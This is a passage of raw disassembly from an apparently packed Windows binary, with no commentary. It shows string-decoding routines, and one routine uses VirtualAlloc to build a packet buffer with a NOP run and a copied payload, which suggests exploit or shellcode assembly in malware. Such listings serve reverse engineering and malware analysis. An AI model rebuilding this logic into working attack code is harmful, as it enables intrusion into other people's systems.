mov [ebp+var_4], edi
call dword_4240A4 ; GetCurrentThread
push eax
call dword_4240A0 ; SetThreadPriority
mov eax, [esi+18h]
mov ebx, [eax+120h]
mov edi, edi
loc_40ABF0: ; CODE XREF: sub_40ABB0+63�j
mov ecx, [esi+18h]
cmp edi, [ecx+11Ch]
jge short loc_40AC1B
mov ecx, [esi+1Ch]
lea edx, [ebx+200h]
push edx
call sub_408E20
push 0Ah
call dword_42408C ; Sleep
inc edi
jmp short loc_40ABF0
; ---------------------------------------------------------------------------
loc_40AC15: ; DATA XREF: UPX0:00426790�o
mov eax, offset loc_40AC1B
retn
; ---------------------------------------------------------------------------
loc_40AC1B: ; CODE XREF: sub_40ABB0+49�j
; DATA XREF: sub_40ABB0:loc_40AC15�o
mov ecx, [ebp+var_C]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
mov esp, ebp
pop ebp
retn
sub_40ABB0 endp
; ---------------------------------------------------------------------------
align 10h
loc_40AC30: ; DATA XREF: UPX0:off_424510�o
push esi
mov esi, ecx
call sub_40AB20
test byte ptr [esp+8], 1
jz short loc_40AC48
push esi
call sub_41930D
add esp, 4
loc_40AC48: ; CODE XREF: UPX0:0040AC3D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40AC50 proc near ; CODE XREF: sub_407140+5E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push ebx
mov ebx, ecx
mov ecx, [esp+4+arg_4]
push esi
push edi
push 40h
mov [ebx+64Ch], eax
mov dword ptr [ebx+654h], 0
mov [ebx+650h], ecx
call sub_4191BC
push 40h
mov [ebx+634h], eax
call sub_4191BC
push 40h
mov [ebx+638h], eax
call sub_4191BC
push 40h
mov [ebx+63Ch], eax
call sub_4191BC
push 40h
mov [ebx+640h], eax
call sub_4191BC
push 40h
mov [ebx+644h], eax
call sub_4191BC
mov edx, [ebx+63Ch]
push edx
mov [ebx+648h], eax
call sub_40E8B0
add esp, 1Ch
push 5
push offset dword_429464
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
loc_40ACE3: ; CODE XREF: sub_40AC50+98�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40ACE3
mov edi, [ebx+63Ch]
sub eax, esi
dec edi
loc_40ACF3: ; CODE XREF: sub_40AC50+A9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40ACF3
mov ecx, eax
shr ecx, 2
rep movsd
push ebp
mov ebp, dword_42408C
mov ecx, eax
and ecx, 3
push 5
rep movsb
call ebp ; Sleep
mov eax, [ebx+638h]
push eax
call sub_40E8B0
add esp, 4
push 9
push offset dword_42946C
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
loc_40AD36: ; CODE XREF: sub_40AC50+EB�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40AD36
mov edi, [ebx+638h]
sub eax, esi
dec edi
loc_40AD46: ; CODE XREF: sub_40AC50+FC�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40AD46
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 3
rep movsb
call ebp ; Sleep
mov ecx, [ebx+634h]
push ecx
call sub_40E8B0
add esp, 4
push 0Fh
push offset dword_429478
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
loc_40AD82: ; CODE XREF: sub_40AC50+137�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40AD82
mov edi, [ebx+634h]
sub eax, esi
dec edi
loc_40AD92: ; CODE XREF: sub_40AC50+148�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40AD92
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 7
rep movsb
call ebp ; Sleep
mov edx, [ebx+648h]
push edx
call sub_40E8B0
add esp, 4
push 5
push offset dword_429488
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
mov edi, edi
loc_40ADD0: ; CODE XREF: sub_40AC50+185�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40ADD0
mov edi, [ebx+648h]
sub eax, esi
dec edi
loc_40ADE0: ; CODE XREF: sub_40AC50+196�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40ADE0
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 0Bh
rep movsb
call ebp ; Sleep
mov eax, [ebx+644h]
push eax
call sub_40E8B0
add esp, 4
push 9
push offset dword_429490
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
lea esp, [esp+0]
loc_40AE20: ; CODE XREF: sub_40AC50+1D5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40AE20
mov edi, [ebx+644h]
sub eax, esi
dec edi
loc_40AE30: ; CODE XREF: sub_40AC50+1E6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40AE30
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 9
rep movsb
call ebp ; Sleep
mov ecx, [ebx+640h]
push ecx
call sub_40E8B0
add esp, 4
push 0Fh
push offset dword_42949C
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
pop ebp
lea ecx, [ecx+0]
loc_40AE70: ; CODE XREF: sub_40AC50+225�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40AE70
mov edi, [ebx+640h]
sub eax, esi
dec edi
loc_40AE80: ; CODE XREF: sub_40AC50+236�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40AE80
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
mov eax, ebx
pop ebx
retn 8
sub_40AC50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40AEA0 proc near ; CODE XREF: sub_407450+89�p
arg_0 = dword ptr 4
push ebx
push ebp
mov ebp, ecx
mov eax, [ebp+654h]
xor ebx, ebx
cmp eax, ebx
jnz loc_40B052
push esi
mov esi, [esp+0Ch+arg_0]
mov eax, [esi+20h]
push edi
add eax, 28h
push 40h
mov [ebp+8], eax
add eax, 64h
push 3000h
push eax
push ebx
mov [ebp+4], eax
call dword_4240F4 ; VirtualAlloc
mov edi, eax
cmp edi, ebx
mov [ebp+0], edi
jnz short loc_40AEE8
push ebx
push ebx
call sub_41A2B3
loc_40AEE8: ; CODE XREF: sub_40AEA0+3F�j
mov ecx, [ebp+4]
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov eax, [ebp+0]
mov [eax+6], ebx
mov [eax+10h], bx
mov word ptr [eax], 1
mov word ptr [eax+4], 300h
mov word ptr [eax+0Ah], 1
mov dword ptr [eax+0Ch], 3Dh
mov edx, 9
mov [eax+2], dx
mov ecx, [ebp+0]
add ecx, 12h
mov [ecx+6], dx
lea edx, [ecx+8]
mov dword ptr [ecx], 10h
mov word ptr [ecx+4], 626h
mov dword ptr [edx], 90909090h
mov ecx, [esi+20h]
mov esi, [esi+18h]
mov ebx, ecx
shr ecx, 2
add edx, 4
mov edi, edx
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, [ebp+8]
xor esi, esi
test cl, 1
jz short loc_40AF71
inc ecx
mov esi, 1
mov [ebp+8], ecx
loc_40AF71: ; CODE XREF: sub_40AEA0+C6�j
lea ecx, [ebp+0Ch]
xor edi, edi
mov ebx, ecx
mov [ebx], edi
mov [ebx+4], edi
mov [ebx+8], di
add esi, edx
mov edx, [esp+10h+arg_0]
mov byte ptr [ebp+10h], 3
mov ebx, 1
mov [ecx], bl
mov edi, [edx+20h]
mov edx, [ecx]
add esi, edi
mov [esi], edx
mov edx, [ecx+4]
mov [esi+4], edx
mov cx, [ecx+8]
mov [esi+8], cx
mov edx, [ebp+8]
shr edx, 1
mov [eax+6], edx
mov eax, [ebp+648h]
mov [ebp+18h], ebx
lea ecx, [ebp+1Ch]
lea ecx, [ecx+0]
loc_40AFC0: ; CODE XREF: sub_40AEA0+128�j
mov dl, [eax]
inc eax
mov [ecx], dl
inc ecx
test dl, dl
jnz short loc_40AFC0
mov ecx, [ebp+644h]
lea edx, [ebp+224h]
loc_40AFD6: ; CODE XREF: sub_40AEA0+13E�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_40AFD6
mov ecx, [ebp+640h]
lea edx, [ebp+42Ch]
lea esp, [esp+0]
loc_40AFF0: ; CODE XREF: sub_40AEA0+158�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_40AFF0
mov eax, [ebp+18h]
mov ecx, [ebp+63Ch]
inc eax
mov [ebp+18h], eax
lea edx, [ebp+120h]
lea ecx, [ecx+0]
loc_40B010: ; CODE XREF: sub_40AEA0+178�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_40B010
mov ecx, [ebp+638h]
lea edx, [ebp+328h]
loc_40B026: ; CODE XREF: sub_40AEA0+18E�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_40B026
mov ecx, [ebp+634h]
lea edx, [ebp+530h]
lea esp, [esp+0]
loc_40B040: ; CODE XREF: sub_40AEA0+1A8�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_40B040
pop edi
mov [ebp+654h], ebx
pop esi
loc_40B052: ; CODE XREF: sub_40AEA0+E�j
pop ebp
pop ebx
retn 4
sub_40AEA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40B060 proc near ; CODE XREF: sub_407450+91�p
push esi
mov esi, ecx
mov eax, [esi+654h]
test eax, eax
jz short loc_40B0D3
mov eax, [esi+8]
mov ecx, [esi+650h]
add eax, 40h
push eax
add ecx, 67Ch
push ecx
call sub_404550
mov edx, [esi+8]
mov eax, [esi+650h]
add edx, 40h
push edx
add eax, 68Ch
push eax
call sub_404550
mov ecx, [esi+8]
mov edx, [esi+650h]
add ecx, 40h
push ecx
add edx, 69Ch
push edx
call sub_404550
mov eax, [esi+8]
mov ecx, [esi]
mov edx, [esi+650h]
push eax
push ecx
add edx, 67Ch
push edx
call sub_4045B0
add esp, 24h
loc_40B0D3: ; CODE XREF: sub_40B060+B�j
pop esi
retn
sub_40B060 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40B0E0 proc near ; CODE XREF: sub_409710+2A0�p
; sub_409E30+315�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
push edi
mov edi, ecx
jz short loc_40B135
push 4
push offset loc_4294AC
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push esi
call sub_41A09A
mov esi, eax
add esp, 8
test esi, esi
jz short loc_40B135
mov eax, [edi+8]
mov ecx, [edi]
push esi
push 1
push eax
push ecx
call sub_419FF2
push esi
mov edi, eax
call sub_419E9A
add esp, 14h
test edi, edi
jle short loc_40B135
pop edi
mov eax, 1
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_40B135: ; CODE XREF: sub_40B0E0+A�j
; sub_40B0E0+2B�j ...
pop edi
xor eax, eax
pop esi
retn 4
sub_40B0E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40B140 proc near ; CODE XREF: sub_4073E0+56�p
push esi
mov esi, ecx
mov eax, [esi+654h]
test eax, eax
jz short loc_40B189
mov eax, [esi]
push 8000h
push 0
push eax
mov dword ptr [esi+654h], 0
call dword_4240F8 ; VirtualFree
mov dword ptr [esi], 0
mov dword ptr [esi+4], 0
mov dword ptr [esi+8], 0
xor ecx, ecx
lea edx, [esi+0Ch]
mov [edx], ecx
mov [edx+4], ecx
mov [edx+8], cx
loc_40B189: ; CODE XREF: sub_40B140+B�j
mov eax, [esi+634h]
push eax
call sub_4198AE
mov ecx, [esi+638h]
push ecx
call sub_4198AE
mov edx, [esi+63Ch]
push edx
call sub_4198AE
mov eax, [esi+640h]
push eax
call sub_4198AE
mov ecx, [esi+644h]
push ecx
call sub_4198AE
mov edx, [esi+648h]
push edx
call sub_4198AE
add esp, 18h
pop esi
retn
sub_40B140 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40B1E0 proc near ; CODE XREF: sub_40C950+102�p
var_484 = byte ptr -484h
var_444 = byte ptr -444h
var_404 = byte ptr -404h
var_4 = dword ptr -4
sub esp, 484h
mov eax, dword_42A290
push ebx
mov [esp+488h+var_4], eax
mov ebx, ecx
call dword_4240B8 ; GetCurrentThreadId
push eax
call sub_419846
add esp, 4
push 0Ch
push offset byte_4294DC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+488h+var_404]
lea esp, [esp+0]
loc_40B220: ; CODE XREF: sub_40B1E0+48�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40B220
push 0Eh
push offset dword_4294E8
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, eax
lea ecx, [ecx+0]
loc_40B240: ; CODE XREF: sub_40B1E0+65�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40B240
push esi
push edi
lea edi, [esp+490h+var_404]
sub eax, edx
dec edi
loc_40B253: ; CODE XREF: sub_40B1E0+79�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B253
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
push 13h
rep movsb
push offset dword_4294F8
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
mov edi, edi
loc_40B280: ; CODE XREF: sub_40B1E0+A5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B280
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B293: ; CODE XREF: sub_40B1E0+B9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B293
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebx+4]
and ecx, 3
add eax, 6ACh
rep movsb
mov ecx, eax
loc_40B2B3: ; CODE XREF: sub_40B1E0+D8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B2B3
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B2C6: ; CODE XREF: sub_40B1E0+EC�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B2C6
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 5
rep movsb
push offset dword_42950C
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
nop
loc_40B2F0: ; CODE XREF: sub_40B1E0+115�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B2F0
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B303: ; CODE XREF: sub_40B1E0+129�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B303
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 14h
rep movsb
push offset dword_429514
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B330: ; CODE XREF: sub_40B1E0+155�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B330
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B343: ; CODE XREF: sub_40B1E0+169�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B343
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 0Ch
rep movsb
push offset byte_429528
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B370: ; CODE XREF: sub_40B1E0+195�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B370
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B383: ; CODE XREF: sub_40B1E0+1A9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B383
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [esp+490h+var_404]
rep movsb
lea ecx, [eax+1]
loc_40B3A3: ; CODE XREF: sub_40B1E0+1C8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B3A3
sub eax, ecx
mov ecx, [ebx+4]
push eax
lea eax, [esp+494h+var_404]
push eax
add ecx, 63Ch
push ecx
call sub_4045B0
call sub_419853
cdq
mov ecx, 6
idiv ecx
add edx, 10h
push edx
lea edx, [esp+4A0h+var_444]
push edx
call sub_40F170
call sub_419853
cdq
mov ecx, 6
idiv ecx
add edx, 10h
push edx
lea edx, [esp+4A8h+var_484]
push edx
call sub_40F170
add esp, 1Ch
push 0Ch
push offset byte_429534
mov ecx, offset off_42AE60
call sub_406AE0
lea ecx, [esp+490h+var_404]
loc_40B415: ; CODE XREF: sub_40B1E0+23D�j
mov dl, [eax]
inc eax
mov [ecx], dl
inc ecx
test dl, dl
jnz short loc_40B415
push 0Eh
push offset dword_429540
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, eax
loc_40B432: ; CODE XREF: sub_40B1E0+257�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40B432
lea edi, [esp+490h+var_404]
sub eax, edx
dec edi
loc_40B443: ; CODE XREF: sub_40B1E0+269�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B443
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
push 4
rep movsb
push offset dword_429550
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
mov edi, edi
loc_40B470: ; CODE XREF: sub_40B1E0+295�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B470
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B483: ; CODE XREF: sub_40B1E0+2A9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B483
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [esp+490h+var_444]
rep movsb
mov ecx, eax
nop
loc_40B4A0: ; CODE XREF: sub_40B1E0+2C5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B4A0
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B4B3: ; CODE XREF: sub_40B1E0+2D9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B4B3
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 5
rep movsb
push offset dword_429554
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B4E0: ; CODE XREF: sub_40B1E0+305�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B4E0
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B4F3: ; CODE XREF: sub_40B1E0+319�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B4F3
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 4
rep movsb
push offset dword_42955C
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B520: ; CODE XREF: sub_40B1E0+345�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B520
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B533: ; CODE XREF: sub_40B1E0+359�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B533
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [esp+490h+var_484]
rep movsb
mov ecx, eax
nop
loc_40B550: ; CODE XREF: sub_40B1E0+375�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B550
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B563: ; CODE XREF: sub_40B1E0+389�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B563
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 5
rep movsb
push offset dword_429560
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B590: ; CODE XREF: sub_40B1E0+3B5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B590
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B5A3: ; CODE XREF: sub_40B1E0+3C9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B5A3
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 0Ah
rep movsb
push offset dword_429568
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B5D0: ; CODE XREF: sub_40B1E0+3F5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B5D0
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B5E3: ; CODE XREF: sub_40B1E0+409�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B5E3
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 14h
rep movsb
push offset dword_429574
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B610: ; CODE XREF: sub_40B1E0+435�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B610
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B623: ; CODE XREF: sub_40B1E0+449�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B623
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 14h
rep movsb
push offset dword_429588
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B650: ; CODE XREF: sub_40B1E0+475�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B650
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B663: ; CODE XREF: sub_40B1E0+489�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B663
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 0Ch
rep movsb
push offset byte_42959C
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B690: ; CODE XREF: sub_40B1E0+4B5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B690
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B6A3: ; CODE XREF: sub_40B1E0+4C9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B6A3
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [esp+490h+var_404]
rep movsb
lea ecx, [eax+1]
loc_40B6C3: ; CODE XREF: sub_40B1E0+4E8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B6C3
sub eax, ecx
mov ecx, [ebx+4]
push eax
lea eax, [esp+494h+var_404]
push eax
add ecx, 62Ch
push ecx
call sub_4045B0
call sub_419853
cdq
mov ecx, 6
idiv ecx
add edx, 10h
push edx
lea edx, [esp+4A0h+var_444]
push edx
call sub_40F170
call sub_419853
cdq
mov ecx, 6
idiv ecx
add edx, 10h
push edx
lea edx, [esp+4A8h+var_484]
push edx
call sub_40F170
add esp, 1Ch
push 0Ch
push offset byte_4295A8
mov ecx, offset off_42AE60
call sub_406AE0
lea ecx, [esp+490h+var_404]
loc_40B735: ; CODE XREF: sub_40B1E0+55D�j
mov dl, [eax]
inc eax
mov [ecx], dl
inc ecx
test dl, dl
jnz short loc_40B735
push 0Eh
push offset dword_4295B4
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, eax
loc_40B752: ; CODE XREF: sub_40B1E0+577�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40B752
lea edi, [esp+490h+var_404]
sub eax, edx
dec edi
loc_40B763: ; CODE XREF: sub_40B1E0+589�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B763
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
push 4
rep movsb
push offset dword_4295C4
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
mov edi, edi
loc_40B790: ; CODE XREF: sub_40B1E0+5B5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B790
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B7A3: ; CODE XREF: sub_40B1E0+5C9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B7A3
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [esp+490h+var_444]
rep movsb
mov ecx, eax
nop
loc_40B7C0: ; CODE XREF: sub_40B1E0+5E5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B7C0
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B7D3: ; CODE XREF: sub_40B1E0+5F9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B7D3
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 5
rep movsb
push offset dword_4295C8
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B800: ; CODE XREF: sub_40B1E0+625�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B800
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B813: ; CODE XREF: sub_40B1E0+639�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B813
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 4
rep movsb
push offset dword_4295D0
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B840: ; CODE XREF: sub_40B1E0+665�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B840
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B853: ; CODE XREF: sub_40B1E0+679�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B853
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [esp+490h+var_484]
rep movsb
mov ecx, eax
nop
loc_40B870: ; CODE XREF: sub_40B1E0+695�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B870
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B883: ; CODE XREF: sub_40B1E0+6A9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B883
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 5
rep movsb
push offset dword_4295D4
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B8B0: ; CODE XREF: sub_40B1E0+6D5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B8B0
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B8C3: ; CODE XREF: sub_40B1E0+6E9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B8C3
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 0Ah
rep movsb
push offset dword_4295DC
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B8F0: ; CODE XREF: sub_40B1E0+715�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B8F0
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B903: ; CODE XREF: sub_40B1E0+729�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B903
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 14h
rep movsb
push offset dword_4295E8
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B930: ; CODE XREF: sub_40B1E0+755�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B930
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B943: ; CODE XREF: sub_40B1E0+769�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B943
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 14h
rep movsb
push offset dword_4295FC
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B970: ; CODE XREF: sub_40B1E0+795�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B970
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B983: ; CODE XREF: sub_40B1E0+7A9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B983
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 0Ch
rep movsb
push offset byte_429610
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40B9B0: ; CODE XREF: sub_40B1E0+7D5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40B9B0
lea edi, [esp+490h+var_404]
sub eax, ecx
mov esi, ecx
dec edi
loc_40B9C3: ; CODE XREF: sub_40B1E0+7E9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40B9C3
mov ecx, eax
